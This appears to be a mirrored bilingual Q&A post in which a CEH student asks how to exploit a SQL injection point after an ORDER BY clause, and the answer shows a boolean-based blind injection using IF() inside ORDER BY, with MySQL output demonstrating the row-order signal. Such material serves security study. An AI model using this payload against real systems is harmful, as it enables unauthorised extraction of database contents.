为 Blind SQL Injection 创建查询 [英] Crafting a query for Blind SQL Injection
问题描述
我发现我的演示网站容易受到 SQL 注入(我目前在做 CEH)
I have found one my demo website is vulnerable to SQL INJECTION (me currently doing CEH)
发现注入点如下:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]
现在我需要制作一些东西来帮助我利用我发现的这个注入点.据我所知,在 ORDER BY
之后 UNION SELECT 将不起作用.但是,我确实认为盲注 sql 注入可能如下图所示
Now i need to craft something which could help me exploit this injection point that i have discovered. As far as I know UNION SELECT wont work after ORDER BY
. However, I do think that blind sql injection may work as illustrated below
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]
现在,如果在注入点发布 1,则查询会出错,而如果将其保持为空白,则查询将执行...因此盲 sql 注入将起作用
Now if 1 is posted at the injection point the query gives error, whereas if its kept blank the query will execute...THUS blind sql injection will work
有人可以帮我在 SQL
中使用 IF THEN ELSE
制作一个查询,因为我不知道如何使用 IF THEN ELSE
在 sql..
Can someone please help me craft a query with IF THEN ELSE
in SQL
as I don't know how to use IF THEN ELSE
in sql..
尝试注入这个但不起作用
Tried Injecting this but not working
(IF (1=2) then 1 endif)
(IF (1=2) then 1 endif)
完成查询
SELECT column_1, column_2, column_3 from `table_1` WHERE `column_4` = '[*available injection point*]' order by id [*available injection point*] ASC limit [*available injection point*],[*available injection point*]
推荐答案
如果 id
在结果集中不是唯一的,并且存在另一列的值对于每个 id
,您可以执行以下操作:
If id
is not unique in the result set and there is another column whose values are unique per id
, you can do the following:
- 用
、unique_per_id
标识每个ID值的唯一顺序(必须与id
不同,在上使用
(如有必要)).desc
id - 使用
, IF(1=1,unique_per_id,id)
可以实现基于布尔值的盲注.
- Identify the order of the unique per ID value with
, unique_per_id
(must be different toid
only, usedesc
onid
if necessary). - Boolean-based blind injection is possible with
, IF(1=1,unique_per_id,id)
.
示例:
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
因此,只要结果集使用 if(expr,host,user)
的顺序与仅使用 host
(第二个查询)的顺序相同,条件 expr
是真的.
So whenever the result set’s order with if(expr,host,user)
is identical to the order with just host
(second query), the condition expr
was true.
这篇关于为 Blind SQL Injection 创建查询的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!